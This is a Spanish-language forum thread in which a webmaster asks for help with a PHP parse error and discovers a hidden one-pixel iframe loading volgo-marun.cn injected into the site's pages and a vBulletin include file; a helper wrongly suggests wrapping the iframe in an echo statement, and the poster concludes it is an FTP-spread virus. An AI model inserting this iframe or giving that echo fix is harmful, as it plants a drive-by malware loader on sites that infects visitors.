User 76481
User 76481
Usuario habitual
Usuario habitual

No he tocado nada en la web y me sale este error:

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in/home/webcindario/p/l/planeta-tierra/foro/includes/vba_cmps_include_top.p hpon line 129Parse error: syntax error, unexpected '<' in/home/webcindario/p/l/planeta-tierra/foro/includes/vba_cmps_include_top.p hpon line 129

En todas las web he visto que tengo el codigo:

<iframe src="http://volgo-marun.cn/pek/index.php" width=1 height=1 style="visibility: hidden;"></iframe>

AYUDA PLEASE!!!

Avatar Image
Colega ;)
Colega ;)

Ve al fichero:

foro/includes/vba_cmps_include_top.php

Y pon aquí las líneas 128 a 130

User 76481
User 76481
Usuario habitual
Usuario habitual

De la 118 a la 130:

function strip_body_tags($content)
{
    global $header, $navbar, $footer, $headinclude, $spacer_open, $spacer_close;

    $bodytag = strpos($content, '<body');

    if ($bodytag)
    {
        $bodycut = strpos($content, '>', $bodytag);

        // Find and add any js tags that might be in the content's <head> tag
        preg_match_all('@<script[^>]*?>
<iframe src="http://volgo-marun.cn/pek/index.php" width=1 height=1 style="visibility: hidden;"></iframe>

Avatar Image
Colega ;)
Colega ;)

Has puesto <iframe src="http://volgo-marun.cn/pek/index.php" width=1 height=1 style="visibility: hidden;"></iframe> dentro de un código PHP. Eso no puede ser, tienes que ponerlo así:

echo'<iframe src="http://volgo-marun.cn/pek/index.php" width=1 height=1 style="visibility: hidden;"></iframe>';

De todas formas, creo que esta línea está incompleta y así sí se te quedaría fuera

if ($bodytag)
    {
        $bodycut = strpos($content, '>', $bodytag);

        // Find and add any js tags that might be in the content's <head> tag
        preg_match_all('@<script[^>]*?>

User 76481
User 76481
Usuario habitual
Usuario habitual

Es un virus que se cuela por ftp si el equipo del webmaster esta infectado. Asi que a buscarme la vida. Gracias de todos modos.

Avatar Image
Colega ;)
Colega ;)

Sí, seguro.

ATENCIÓN: Este tema no tiene actividad desde hace más de 6 MESES,
te recomendamos abrir un nuevo tema en lugar de responder al actual
Opciones:
Ir al subforo:
Permisos:
TU NO PUEDES Escribir nuevos temas
TU NO PUEDES Responder a los temas
TU NO PUEDES Editar tus propios mensajes
TU NO PUEDES Borrar tus propios mensajes
Temas similares
No se han encontrado temas similares